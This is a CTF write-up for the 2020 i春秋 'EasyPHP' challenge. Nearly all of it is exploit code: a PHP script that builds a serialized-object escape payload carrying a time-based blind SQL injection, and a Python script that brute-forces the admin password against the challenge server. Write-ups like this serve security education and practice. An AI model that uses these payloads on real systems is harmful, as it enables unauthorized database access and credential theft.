2020 i春秋新春公益赛 EasyPHP
反序列化字符逃逸+反序列化执行sql语句盲注。
一开始想改admin密码,浪费了太多时间
solve.php
//solve.php
<?php
function safe($parm)
{
$array = array('union', 'regexp', 'load', 'into', 'flag', 'file', 'insert', "'", '\\', "*", "alter");
return str_replace($array, 'hacker', $parm);
}
class User
{
public $age = null;
public $nickname = null;
public function __construct($age, $nickname)
{
$this->age = $age;
$this->nickname = $nickname;
}
}
class Info
{
public $age;
public $nickname;
public $CtrlCase;
public function __construct($age = null, $nickname = null, $CtrlCase = null)
{
$this->age = $age;
$this->nickname = $nickname;
$this->CtrlCase = $CtrlCase;
}
}
Class UpdateHelper
{
public $sql;
public function __construct($sql)
{
$this->sql = $sql;
}
}
class dbCtrl
{
public $name;
public function __construct($name)
{
$this->name = $name;
}
}
$sql = $sql = "SELECT if(substr((select password from user where username=0x61646D696E),".$_GET['pos'].",1)=0x".bin2hex($_GET['hex']).",sleep(2),0)";
$e = new dbCtrl('admin');
$d = new Info(null,null,$e);
$c = new User($sql, $d);
$b = new UpdateHelper($c);
$age = 18;
$padding = 'flag' . (strlen($_GET['pos'])==1?'union':'flag');
$payload = str_repeat('*', 58).$padding;
//$payload = str_repeat('*', 58).'flagunion';
$nickname = $payload."\";s:8:\"CtrlCase\";".serialize($b)."}";
echo $nickname;
exp.py
from time import sleep
import requests
import string
payload_url = "http://localhost/ctf/solve.php"
url = "http://b9df8ffa-d7c7-4a11-a7b4-dc4227a83473.node3.buuoj.cn/update.php"
result = ""
s = requests.session()
for i in range(1, 33):
for x in string.ascii_lowercase + string.digits:
data = {
"age": "18",
"nickname": requests.get(payload_url + f"?hex={x}&pos={i}").text
}
try:
code = 0
flag = False
while code != 200:
response = s.post(url, data=data, timeout=2)
code = response.status_code
print(code, i, x)
sleep(0.15)
except:
result += x
print(result)
break
